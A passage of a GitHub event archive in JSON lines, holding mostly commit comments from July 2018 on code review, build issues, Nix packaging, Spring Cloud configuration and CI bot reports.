projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T00:18:21Z"}
{"id":"7933124700","type":"CommitCommentEvent","actor":{"login":"ChikereNwali"},"repo":{"name":"ChikereNwali/ChikereNwali.github.io"},"payload":{"comment":{"id":29631427,"position":null,"line":null,"path":null,"commit_id":"b40c4219bee3e55c95f1a6ff54ead7ea98bf22df","created_at":"2018-07-08T00:19:26Z","updated_at":"2018-07-08T00:19:26Z","author_association":"OWNER","body":"Jekyll Theme"}},"created_at":"2018-07-08T00:19:26Z"}
{"id":"7933124831","type":"CommitCommentEvent","actor":{"login":"Srini544"},"repo":{"name":"Srini544/CloudFor"},"payload":{"comment":{"id":29631428,"position":null,"line":null,"path":null,"commit_id":"aa9a759b09136a5962634da0e79faffb5d1b9e6e","created_at":"2018-07-08T00:19:37Z","updated_at":"2018-07-08T00:19:37Z","author_association":"OWNER","body":"no comments"}},"created_at":"2018-07-08T00:19:37Z"}
{"id":"7933141316","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29631448,"position":null,"line":null,"path":null,"commit_id":"cb789dbe914a593edbda9268509e88b9b136e1f8","created_at":"2018-07-08T00:38:08Z","updated_at":"2018-07-08T00:38:08Z","author_association":"NONE","body":"Will this commit fix these issues that we are still experiencing on the buildbot? \r\n\r\n<retrobot> theodore: [status: done] [recipes/nintendo/3ds]\r\n<retrobot> retroarch: [status: fail] [recipes/nintendo/3ds] LOG: http://p.0bl.net/14865"}},"created_at":"2018-07-08T00:38:08Z"}
{"id":"7933141787","type":"CommitCommentEvent","actor":{"login":"tyllurius"},"repo":{"name":"ShikOfTheRa/scarab-osd"},"payload":{"comment":{"id":29631449,"position":null,"line":null,"path":null,"commit_id":"9ccb284c2ae536c7046490a6beaa0d2ede62e8fd","created_at":"2018-07-08T00:38:37Z","updated_at":"2018-07-08T00:38:37Z","author_association":"NONE","body":"Confirm this working correctly."}},"created_at":"2018-07-08T00:38:37Z"}
{"id":"7933142179","type":"CommitCommentEvent","actor":{"login":"Pinacolada64"},"repo":{"name":"Pinacolada64/ImageBBS"},"payload":{"comment":{"id":29631451,"position":null,"line":null,"path":null,"commit_id":"69ec3d3316d958b615fffb3c3c8f25c9a9424397","created_at":"2018-07-08T00:39:02Z","updated_at":"2018-07-08T00:39:02Z","author_association":"OWNER","body":"That's fine, it wouldn't actually take long to merge in your changes from what is in this respository when I get your updated install disk. That is my _whole point_ of using git. The \"getting out of sync\" thing: if we all used Git, we could do a `git pull` each day we started work, to pull down the latest changes (experimental, production-ready or broken altogether :wink: ) to ensure we're \"all on the same page.\" If you go to [your fork](https://github.com/x-tec2017/ImageBBS) and do a [comparison between your fork and mine](https://github.com/x-tec2017/ImageBBS/compare/master...Pinacolada64:master) you can see all the stuff that's changed since the last one! It's kinda heartening to see all the progress we've made. Although it makes it look like I've done more work than I have since some of this stuff was your work, and I just uploaded it under my account. You'll get the hang of it!\r\n\r\nI guess my thought is, if we've already got modern PCs slaved to our Commodore 64s to run tcpser or BBS Server, why not have some scripted process:\r\n\r\n1. pull updated files from GitHub\r\n2. run them through c64list\r\n3. a terminal program calls the BBS while it's idle and put updated files on the BBS?\r\n\r\nThere's got to be a way to do that... Getting out of sync with each other (and that's just two sysops! imagine managing versions on an entire network... oh wait, we have that :smile: ) ...the solution just hasn't been written yet for the native C64! Hmm, now I'm thinking. I think it would be really cool to write some kind of NetMaint module that checked versions  of installed +.files against, say, your master list on one or two particular BBSes, and sent `nm.F.*` files (that's to send network updates, right? or is that `nm.U.*`, I forget) down the pike to the caller.\r\n\r\nThe purpose of a branch *is* for testing features. I know the file copier with my mods isn't ready yet. You make a \"pull request\" when a feature is deemed complete and ready to be brought into the \"master\" branch: i.e., goes out on the next distribution disk. I'm writing scripts that will automate this stuff. I know it's a mess right now (I'm not even playing 100% by my file naming conventions!), but I'm incrementally improving things. There are scripts to take Commodore .prg files and turn them into C64List .lbl files (for me, I know you like to do it on the real C64! which is awesome!), and vice versa. It's getting easier, I think. The next step would be (and I have something similar enough in my adventure game repository) to automatically build a disk image out of the latest files, having a build date at the end of each program in a `998 rem ...` statement or something -- that way you can tell at a glance you've got the latest version. \r\n\r\nAnyway, I'm rambling... Another incoherent post by Pinacolada. Can't wait to check out the latest files. :smile: \r\n"}},"created_at":"2018-07-08T00:39:02Z"}
{"id":"7933142563","type":"CommitCommentEvent","actor":{"login":"denis1974"},"repo":{"name":"denis1974/---"},"payload":{"comment":{"id":29631453,"position":null,"line":null,"path":null,"commit_id":"572cc31a12a4b94dcc455c2567835ce8d48eef9e","created_at":"2018-07-08T00:39:31Z","updated_at":"2018-07-08T00:39:31Z","author_association":"OWNER","body":"![always-hot](https://user-images.githubusercontent.com/40923947/42415718-e3fd7f38-8268-11e8-979c-c742e919dae8.jpg)\r\n"}},"created_at":"2018-07-08T00:39:31Z"}
{"id":"7933143421","type":"CommitCommentEvent","actor":{"login":"alexkeh"},"repo":{"name":"oracle/dotnet-db-samples"},"payload":{"comment":{"id":29631455,"position":null,"line":null,"path":null,"commit_id":"185d8b67ed8ae8ae3dc3a7c0ba6d76ab9bbcf7ce","created_at":"2018-07-08T00:40:27Z","updated_at":"2018-07-08T00:40:27Z","author_association":"MEMBER","body":"ODP.NET 18c can be downloaded as part of the Oracle DB 18c Client here: http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html\r\n\r\nThe new batch script will first be part of ODAC 18c Release 2 later this year. I will correct the README to reflect that."}},"created_at":"2018-07-08T00:40:27Z"}
{"id":"7933143488","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"Zlika/theodore"},"payload":{"comment":{"id":29631456,"position":null,"line":null,"path":null,"commit_id":"36a3ba61c7af3d63354972c18cfb7bd91aeadf8a","created_at":"2018-07-08T00:40:32Z","updated_at":"2018-07-08T00:40:32Z","author_association":"NONE","body":"Hi, about older versions of MSVC -\r\n\r\nhttps://github.com/libretro/beetle-pce-fast-libretro/tree/master/libretro-common/include/compat/msvc\r\n\r\nThere is an stdint.h file here.\r\n\r\nYou can add it like this if you are using Makefile.common -\r\n\r\nhttps://github.com/libretro/beetle-pce-fast-libretro/blob/master/Makefile.common#L19\r\n\r\nAs for stdbool.h - I would recommend not using it and instead using boolean.h - we supply that too -\r\n\r\nhttps://github.com/libretro/beetle-pce-fast-libretro/blob/master/libretro-common/include/boolean.h\r\n\r\nThis is just a wrapper file around stdbool.h - and for platforms/targets that don't have stdbool.h, it just defines bool."}},"created_at":"2018-07-08T00:40:32Z"}
{"id":"7933143726","type":"CommitCommentEvent","actor":{"login":"denis1974"},"repo":{"name":"denis1974/---"},"payload":{"comment":{"id":29631457,"position":null,"line":null,"path":null,"commit_id":"572cc31a12a4b94dcc455c2567835ce8d48eef9e","created_at":"2018-07-08T00:40:49Z","updated_at":"2018-07-08T00:40:49Z","author_association":"OWNER","body":"suftr"}},"created_at":"2018-07-08T00:40:49Z"}
{"id":"7933144945","type":"CommitCommentEvent","actor":{"login":"LyesSaadi"},"repo":{"name":"TheOpenMedium/HAY"},"payload":{"comment":{"id":29631458,"position":null,"line":null,"path":null,"commit_id":"f2a9ef2996af2db79e1abf1856fe42fc75f8661a","created_at":"2018-07-08T00:42:17Z","updated_at":"2018-07-08T00:42:17Z","author_association":"MEMBER","body":"Solving the comment send area bug* !"}},"created_at":"2018-07-08T00:42:17Z"}
{"id":"7933145661","type":"CommitCommentEvent","actor":{"login":"AR98"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29631460,"position":null,"line":null,"path":null,"commit_id":"adf90d17fa802b2b5229d29faebee4b3991017b1","created_at":"2018-07-08T00:43:09Z","updated_at":"2018-07-08T00:43:09Z","author_association":"NONE","body":" WordAdapter adapter1 = new WordAdapter(this, words, R.color.**category_colors**);\r\nIn my code category_colors and category_phrase, category_family,category_phrases showing error......can anyone tell me where I need to define their values.....because I just use those words in only WordAdapter  as a 3rd parameter?"}},"created_at":"2018-07-08T00:43:09Z"}
{"id":"7933148364","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"holzschu/lua_ios"},"payload":{"comment":{"id":29631464,"position":null,"line":null,"path":null,"commit_id":"5585413486a82c26024f106140a8a243028710cf","created_at":"2018-07-08T00:46:17Z","updated_at":"2018-07-08T00:46:17Z","author_association":"NONE","body":"https://github.com/holzschu/lua_ios/commit/5585413486a82c26024f106140a8a243028710cf#diff-7ff6a8cb1b92a5eb9e65bd6ceb8ca815"}},"created_at":"2018-07-08T00:46:17Z"}
{"id":"7933148410","type":"CommitCommentEvent","actor":{"login":"Vynel"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29631465,"position":null,"line":null,"path":null,"commit_id":"049386b93662ad62ea6f779ed5832865ffbde242","created_at":"2018-07-08T00:46:22Z","updated_at":"2018-07-08T00:46:22Z","author_association":"NONE","body":"work ! ty"}},"created_at":"2018-07-08T00:46:22Z"}
{"id":"7933149233","type":"CommitCommentEvent","actor":{"login":"samueldr"},"repo":{"name":"worldofpeace/nixpkgs"},"payload":{"comment":{"id":29631466,"position":45,"line":45,"path":"pkgs/development/libraries/libunity/default.nix","commit_id":"b1a78ce4b7c1bba430a2c98441578edaa0ecc584","created_at":"2018-07-08T00:47:19Z","updated_at":"2018-07-08T00:47:19Z","author_association":"NONE","body":"There's a stray space at the end."}},"created_at":"2018-07-08T00:47:19Z"}
{"id":"7933149579","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631467,"position":14,"line":14,"path":"Makefile","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T00:47:42Z","updated_at":"2018-07-08T00:47:42Z","author_association":"NONE","body":"Coloured output, like it.\r\nHow it could be done in other way:\r\n```Makefile\r\nb = \\033[0;36m\r\nr = \\033[0;34m\r\ng = \\033[0;32m\r\ne = \\033[0m\r\n\r\n$(NAME):\r\n\t@echo -e '$bSources compiling...$e'\r\n\t$(CC) $(CFLAGS) $(OBJ) -o $(NAME)\r\n\t@echo -e \"$gCompile with SUCCESS!$e\"\r\n```"}},"created_at":"2018-07-08T00:47:42Z"}
{"id":"7933150810","type":"CommitCommentEvent","actor":{"login":"jtojnar"},"repo":{"name":"worldofpeace/nixpkgs"},"payload":{"comment":{"id":29631468,"position":9,"line":9,"path":"pkgs/development/libraries/libunity/default.nix","commit_id":"b1a78ce4b7c1bba430a2c98441578edaa0ecc584","created_at":"2018-07-08T00:49:11Z","updated_at":"2018-07-08T00:49:11Z","author_association":"NONE","body":"For libraries `out` should be used instead of `lib`."}},"created_at":"2018-07-08T00:49:11Z"}
{"id":"7933151469","type":"CommitCommentEvent","actor":{"login":"Vynel"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29631474,"position":null,"line":null,"path":null,"commit_id":"2c7485c11c4e62479a61d3b2e28fd84677e2fe40","created_at":"2018-07-08T00:49:58Z","updated_at":"2018-07-08T00:49:58Z","author_association":"NONE","body":"idont understand my friend ! :("}},"created_at":"2018-07-08T00:49:58Z"}
{"id":"7933151695","type":"CommitCommentEvent","actor":{"login":"jtojnar"},"repo":{"name":"worldofpeace/nixpkgs"},"payload":{"comment":{"id":29631475,"position":29,"line":29,"path":"pkgs/development/libraries/libunity/default.nix","commit_id":"b1a78ce4b7c1bba430a2c98441578edaa0ecc584","created_at":"2018-07-08T00:50:11Z","updated_at":"2018-07-08T00:50:11Z","author_association":"NONE","body":"`gnome-common` should go to `nativeBuildInputs`"}},"created_at":"2018-07-08T00:50:11Z"}
{"id":"7933152148","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631476,"position":9,"line":9,"path":"Makefile","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T00:50:41Z","updated_at":"2018-07-08T00:50:41Z","author_association":"NONE","body":"Don't mute the gcc"}},"created_at":"2018-07-08T00:50:41Z"}
{"id":"7933152219","type":"CommitCommentEvent","actor":{"login":"Gumball12"},"repo":{"name":"Gumball12/_"},"payload":{"comment":{"id":29631477,"position":null,"line":null,"path":null,"commit_id":"d6e78da86a91143de970119a55d0b37be764400b","created_at":"2018-07-08T00:50:46Z","updated_at":"2018-07-08T00:50:46Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-08T00:50:46Z"}
{"id":"7933152337","type":"CommitCommentEvent","actor":{"login":"Grovkillen"},"repo":{"name":"letscontrolit/ESPEasy"},"payload":{"comment":{"id":29631478,"position":349,"line":367,"path":"platformio.ini","commit_id":"e7764ca7e693f8d9ce7e30c2c266ef8628b2a1a5","created_at":"2018-07-08T00:50:56Z","updated_at":"2018-07-08T00:50:56Z","author_association":"MEMBER","body":"These * looks a bit off ;)"}},"created_at":"2018-07-08T00:50:56Z"}
{"id":"7933153235","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631480,"position":11,"line":11,"path":"Makefile","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T00:52:07Z","updated_at":"2018-07-08T00:52:07Z","author_association":"NONE","body":"Try to add file named `all` in your projects directory and then run `make all`. That's why `.PHONY` is needed"}},"created_at":"2018-07-08T00:52:07Z"}
{"id":"7933154256","type":"CommitCommentEvent","actor":{"login":"Infinisil"},"repo":{"name":"worldofpeace/nixpkgs"},"payload":{"comment":{"id":29631483,"position":33,"line":33,"path":"pkgs/development/libraries/libunity/default.nix","commit_id":"b1a78ce4b7c1bba430a2c98441578edaa0ecc584","created_at":"2018-07-08T00:53:21Z","updated_at":"2018-07-08T00:53:21Z","author_association":"NONE","body":"Why are these in propagated?"}},"created_at":"2018-07-08T00:53:21Z"}
{"id":"7933157958","type":"CommitCommentEvent","actor":{"login":"edrickhong"},"repo":{"name":"edrickhong/Cu"},"payload":{"comment":{"id":29631489,"position":null,"line":null,"path":null,"commit_id":"4b76bfa88a10ad92c2c5faca6a5eb3d4d72efaca","created_at":"2018-07-08T00:57:48Z","updated_at":"2018-07-08T00:57:48Z","author_association":"OWNER","body":"Ubuntu trusty uses an older header that doesn't split wayland-client.h into a separate core file. Thus it uses a different #define to undef its contents"}},"created_at":"2018-07-08T00:57:48Z"}
{"id":"7933158711","type":"CommitCommentEvent","actor":{"login":"Zxilly"},"repo":{"name":"iikira/BaiduPCS-Go"},"payload":{"comment":{"id":29631490,"position":null,"line":null,"path":null,"commit_id":"8f944b32a7981b5370bcc19b32fbbb8640938c63","created_at":"2018-07-08T00:58:41Z","updated_at":"2018-07-08T00:58:41Z","author_association":"NONE","body":"流式下载有什么优势吗？"}},"created_at":"2018-07-08T00:58:41Z"}
{"id":"7933161302","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29631500,"position":4,"line":134,"path":"packages/eslint-plugin-taro/rules/jsx.js","commit_id":"87f80a4d41539708661ecfcb9dff8e09fed7cc0f","created_at":"2018-07-08T01:01:24Z","updated_at":"2018-07-08T01:01:24Z","author_association":"NONE","body":"on"}},"created_at":"2018-07-08T01:01:24Z"}
{"id":"7933162115","type":"CommitCommentEvent","actor":{"login":"jtojnar"},"repo":{"name":"worldofpeace/nixpkgs"},"payload":{"comment":{"id":29631503,"position":33,"line":33,"path":"pkgs/development/libraries/libunity/default.nix","commit_id":"b1a78ce4b7c1bba430a2c98441578edaa0ecc584","created_at":"2018-07-08T01:02:16Z","updated_at":"2018-07-08T01:02:16Z","author_association":"NONE","body":"I suppose they are in pkg-config's Requires."}},"created_at":"2018-07-08T01:02:16Z"}
{"id":"7933162144","type":"CommitCommentEvent","actor":{"login":"codacy-bot"},"repo":{"name":"KihongHeo/test"},"payload":{"comment":{"id":29631504,"position":null,"line":null,"path":null,"commit_id":"bfa241d1f6f6aedc71ad13b7888c9ce80dc3c0c1","created_at":"2018-07-08T01:02:18Z","updated_at":"2018-07-08T01:02:18Z","author_association":"NONE","body":"### [Codacy](https://app.codacy.com/app/KihongHeo/test/commit?cid=220387653) detected an issue:\n#### Message: `Array 'buf[100]' accessed at index 100, which is out of bounds.`\n\n    \n#### Occurred on:\n+ **Commit**:  bfa241d1f6f6aedc71ad13b7888c9ce80dc3c0c1\n+ **File**:    [main.c](https://github.com/KihongHeo/test/blob/bfa241d1f6f6aedc71ad13b7888c9ce80dc3c0c1/main.c)\n+ **LineNum**: [7](https://github.com/KihongHeo/test/blob/bfa241d1f6f6aedc71ad13b7888c9ce80dc3c0c1/main.c#L7)\n+ **Code**:    `buf[100] = 0;`\n\n    \n#### Currently on:\n+ **Commit**:  bfa241d1f6f6aedc71ad13b7888c9ce80dc3c0c1\n+ **File**:    [main.c](https://github.com/KihongHeo/test/blob/bfa241d1f6f6aedc71ad13b7888c9ce80dc3c0c1/main.c)\n+ **LineNum**: [7](https://github.com/KihongHeo/test/blob/bfa241d1f6f6aedc71ad13b7888c9ce80dc3c0c1/main.c#L7)\n    "}},"created_at":"2018-07-08T01:02:18Z"}
{"id":"7933162273","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29631505,"position":4,"line":134,"path":"packages/eslint-plugin-taro/rules/jsx.js","commit_id":"87f80a4d41539708661ecfcb9dff8e09fed7cc0f","created_at":"2018-07-08T01:02:26Z","updated_at":"2018-07-08T01:02:26Z","author_association":"NONE","body":"87f80a4"}},"created_at":"2018-07-08T01:02:26Z"}
{"id":"7933162389","type":"CommitCommentEvent","actor":{"login":"jtojnar"},"repo":{"name":"worldofpeace/nixpkgs"},"payload":{"comment":{"id":29631508,"position":45,"line":45,"path":"pkgs/development/libraries/libunity/default.nix","commit_id":"b1a78ce4b7c1bba430a2c98441578edaa0ecc584","created_at":"2018-07-08T01:02:35Z","updated_at":"2018-07-08T01:02:35Z","author_association":"NONE","body":"Also a stray dash."}},"created_at":"2018-07-08T01:02:35Z"}
{"id":"7933162565","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29631510,"position":3,"line":133,"path":"packages/eslint-plugin-taro/rules/jsx.js","commit_id":"87f80a4d41539708661ecfcb9dff8e09fed7cc0f","created_at":"2018-07-08T01:02:47Z","updated_at":"2018-07-08T01:02:47Z","author_association":"NONE","body":"87f80a4"}},"created_at":"2018-07-08T01:02:47Z"}
{"id":"7933162602","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631511,"position":62,"line":62,"path":"find_determinant.c","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T01:02:50Z","updated_at":"2018-07-08T01:02:50Z","author_association":"NONE","body":"You made this malloc unhappy. It cries every time its retval being casted.\r\nHere's how it could be linked towards the type (no error checking here):\r\n```C\r\n\tint **matrix = malloc(n * sizeof(*matrix));\r\n\tfor (int i=0; i < n; i++) {\r\n\t\tmatrix[i] = malloc(n * sizeof(**matrix));\r\n\t}\r\n```"}},"created_at":"2018-07-08T01:02:50Z"}
{"id":"7933162854","type":"CommitCommentEvent","actor":{"login":"worldofpeace"},"repo":{"name":"worldofpeace/nixpkgs"},"payload":{"comment":{"id":29631512,"position":33,"line":33,"path":"pkgs/development/libraries/libunity/default.nix","commit_id":"b1a78ce4b7c1bba430a2c98441578edaa0ecc584","created_at":"2018-07-08T01:03:08Z","updated_at":"2018-07-08T01:03:08Z","author_association":"OWNER","body":"It was in the original expression and I though it was sane. No idea :rofl: "}},"created_at":"2018-07-08T01:03:08Z"}
{"id":"7933162859","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"NervJS/taro"},"payload":{"comment":{"id":29631513,"position":8,"line":137,"path":"packages/eslint-plugin-taro/rules/jsx.js","commit_id":"87f80a4d41539708661ecfcb9dff8e09fed7cc0f","created_at":"2018-07-08T01:03:09Z","updated_at":"2018-07-08T01:03:09Z","author_association":"NONE","body":"87f80a4"}},"created_at":"2018-07-08T01:03:09Z"}
{"id":"7933164401","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29631515,"position":9,"line":43,"path":"config-service/src/main/resources/shared/analytics-service.yml","commit_id":"2af5892866c21c210a41c09cb392734006ed933d","created_at":"2018-07-08T01:04:56Z","updated_at":"2018-07-08T01:04:56Z","author_association":"OWNER","body":"I was getting 404 error when accessing in **/actuator/hystrix.stream**. As mentioned in [Document enabling /hystrix.stream actuator endpoint issue](https://github.com/spring-cloud/spring-cloud-netflix/issues/2785) added **management.endpoints.web.exposure.include=hystrix.stream**  which resolved the issue."}},"created_at":"2018-07-08T01:04:56Z"}
{"id":"7933165590","type":"CommitCommentEvent","actor":{"login":"tanyongkiat123"},"repo":{"name":"NervJS/taro-todo"},"payload":{"comment":{"id":29631516,"position":4,"line":22,"path":"README.md","commit_id":"0b28f776815f6f9852eaa283337411183dfee1eb","created_at":"2018-07-08T01:06:23Z","updated_at":"2018-07-08T01:06:23Z","author_association":"NONE","body":"off"}},"created_at":"2018-07-08T01:06:23Z"}
{"id":"7933167154","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29631519,"position":null,"line":null,"path":null,"commit_id":"1a092a6642b72c867253f970d09eaf32b4ce7470","created_at":"2018-07-08T01:08:16Z","updated_at":"2018-07-08T01:08:16Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 690](https://travis-ci.org/per1234/arduino-ci-script/builds/401337469) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00690-001-tsv"}},"created_at":"2018-07-08T01:08:16Z"}
{"id":"7933167266","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29631520,"position":null,"line":null,"path":null,"commit_id":"1a092a6642b72c867253f970d09eaf32b4ce7470","created_at":"2018-07-08T01:08:23Z","updated_at":"2018-07-08T01:08:23Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 690](https://travis-ci.org/per1234/arduino-ci-script/builds/401337469) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00690"}},"created_at":"2018-07-08T01:08:23Z"}
{"id":"7933168225","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29631524,"position":14,"line":14,"path":"analytics-service/src/main/java/com/emprovise/service/config/SecurityConfig.java","commit_id":"2af5892866c21c210a41c09cb392734006ed933d","created_at":"2018-07-08T01:09:29Z","updated_at":"2018-07-08T01:09:29Z","author_association":"OWNER","body":"Ignoring **/actuator/hystrix.stream** URL from authorization as unable to determine the basic authentication configuration for hystrix.stream as discussed in the [Basic auth protection for hystrix.stream issue](https://github.com/spring-cloud/spring-cloud-netflix/issues/1719)."}},"created_at":"2018-07-08T01:09:29Z"}
{"id":"7933168342","type":"CommitCommentEvent","actor":{"login":"iikira"},"repo":{"name":"iikira/BaiduPCS-Go"},"payload":{"comment":{"id":29631525,"position":null,"line":null,"path":null,"commit_id":"8f944b32a7981b5370bcc19b32fbbb8640938c63","created_at":"2018-07-08T01:09:38Z","updated_at":"2018-07-08T01:09:38Z","author_association":"OWNER","body":"可自行尝试，网络环境不同优势可能也不同"}},"created_at":"2018-07-08T01:09:38Z"}
{"id":"7933168524","type":"CommitCommentEvent","actor":{"login":"BaoAdrian"},"repo":{"name":"BaoAdrian/Bitcoin_Exchange"},"payload":{"comment":{"id":29631529,"position":null,"line":null,"path":null,"commit_id":"cfc4156c575fd3c7d72cce56c8a66e88b06a6ca1","created_at":"2018-07-08T01:09:52Z","updated_at":"2018-07-08T01:09:52Z","author_association":"OWNER","body":"Upload Sample Images"}},"created_at":"2018-07-08T01:09:52Z"}
{"id":"7933171027","type":"CommitCommentEvent","actor":{"login":"CastOfficial"},"repo":{"name":"CastOfficial/pmmp-php-composer-cmd"},"payload":{"comment":{"id":29631531,"position":null,"line":null,"path":null,"commit_id":"db50f50e35a4f7ea01e3871843f62a4cde13d8c6","created_at":"2018-07-08T01:12:43Z","updated_at":"2018-07-08T01:12:43Z","author_association":"OWNER","body":"https://pastebin.com/d0GsYDBX"}},"created_at":"2018-07-08T01:12:43Z"}
{"id":"7933174257","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29631541,"position":8,"line":8,"path":"config-service/src/main/resources/shared/monitor-service.yml","commit_id":"2af5892866c21c210a41c09cb392734006ed933d","created_at":"2018-07-08T01:16:19Z","updated_at":"2018-07-08T01:16:19Z","author_association":"OWNER","body":"As per [Spring Cloud docs](https://cloud.spring.io/spring-cloud-netflix/multi/multi__hystrix_timeouts_and_ribbon_clients.html), the **turbine.appConfig** configuration key is a list of Eureka serviceIds that turbine uses to lookup instances. The **clusterConfig** contains all the **clusterName** aka cluster key which by default is appName, i.e. the Eureka serviceId. We can configure one default cluster for all the applications using `clusterNameExpression: \"'default'\"` in which case cluster parameter can be omitted while calling **/turbine.stream**."}},"created_at":"2018-07-08T01:16:19Z"}
{"id":"7933176272","type":"CommitCommentEvent","actor":{"login":"MakeTheBrainHappy"},"repo":{"name":"MakeTheBrainHappy/ProjectEuler1"},"payload":{"comment":{"id":29631544,"position":null,"line":null,"path":null,"commit_id":"0fc7f75311ea13fd3c37ee54f190998c47c2c020","created_at":"2018-07-08T01:18:52Z","updated_at":"2018-07-08T01:18:52Z","author_association":"OWNER","body":"Hey! If you are looking for more Scratchers who work with GitHub, then I would recommend looking at the users who follow me. \r\n\r\nI've actually created a very simple guide about GitHub with some other Scratchers here: http://www.makethebrainhappy.com/2018/01/how-to-use-github.html \r\n\r\nPerhaps I should create a Project about GitHub though. :)"}},"created_at":"2018-07-08T01:18:52Z"}
{"id":"7933177004","type":"CommitCommentEvent","actor":{"login":"sparkfysky"},"repo":{"name":"sparkfysky/air"},"payload":{"comment":{"id":29631546,"position":null,"line":null,"path":null,"commit_id":"38acba70138e87474b1cfddbdd237e1cbf10f805","created_at":"2018-07-08T01:19:47Z","updated_at":"2018-07-08T01:19:47Z","author_association":"OWNER","body":"\r\n[XJSSMProject.zip](https://github.com/sparkfysky/air/files/2173241/XJSSMProject.zip)\r\n"}},"created_at":"2018-07-08T01:19:47Z"}
{"id":"7933178166","type":"CommitCommentEvent","actor":{"login":"bellhkim"},"repo":{"name":"DataAnalysisStudy/DataAnalysis_Study"},"payload":{"comment":{"id":29631550,"position":null,"line":null,"path":null,"commit_id":"83b0fe63d22cbb44d6d83880ddd9a77b3996e83a","created_at":"2018-07-08T01:21:09Z","updated_at":"2018-07-08T01:21:09Z","author_association":"COLLABORATOR","body":"잘 정리되어 있네요 다시봐도 ^^;; 수고하셨습니다.\r\n"}},"created_at":"2018-07-08T01:21:09Z"}
{"id":"7933184695","type":"CommitCommentEvent","actor":{"login":"ingmargoudt"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":29631565,"position":24,"line":115,"path":"Mage.Tests/src/test/java/org/mage/test/sets/BoosterGenerationTest.java","commit_id":"36c004122ab525f53afec266018a09377de40fd8","created_at":"2018-07-08T01:28:35Z","updated_at":"2018-07-08T01:28:35Z","author_association":"CONTRIBUTOR","body":"Nice use of the anyMatch operator! You could also use card.isLand() rather than getCardType().contains(...)\r\nYou could also do card.getRarity() == Rarity.COMMON (enum equalisation is usually done by a ==)"}},"created_at":"2018-07-08T01:28:35Z"}
{"id":"7933187657","type":"CommitCommentEvent","actor":{"login":"yodaldevoid"},"repo":{"name":"varkor/rust"},"payload":{"comment":{"id":29631575,"position":15,"line":393,"path":"src/librustc/hir/mod.rs","commit_id":"3f16739edeb8c9bb2b3228b682e0e5f1039f1c17","created_at":"2018-07-08T01:31:46Z","updated_at":"2018-07-08T01:31:46Z","author_association":"COLLABORATOR","body":"I looked at inlining `ConstArg` as you suggested when originally implementing this and came to the same conclusion when working through this change. Until we have nailed down what we want in `ConstArg` (and maybe eventually `GenericArg::Const`) this setup keeps any changes from creating churn all over the place."}},"created_at":"2018-07-08T01:31:46Z"}
{"id":"7933187847","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"dlyubich/02-P-Dev_Tools"},"payload":{"comment":{"id":29631576,"position":53,"line":53,"path":"find_determinant.c","commit_id":"e318836945d4f68590d839b033c67b25568333ed","created_at":"2018-07-08T01:32:00Z","updated_at":"2018-07-08T01:32:00Z","author_association":"NONE","body":"no need for tmp here.\r\n```C\r\nvoid free_arr(int ***arr, int size)\r\n{\r\n    for (int i = 0; i < size; i++)\r\n        free(*arr[i]);\r\n    free(*arr);\r\n    *arr = NULL;\r\n}\r\n```"}},"created_at":"2018-07-08T01:32:00Z"}
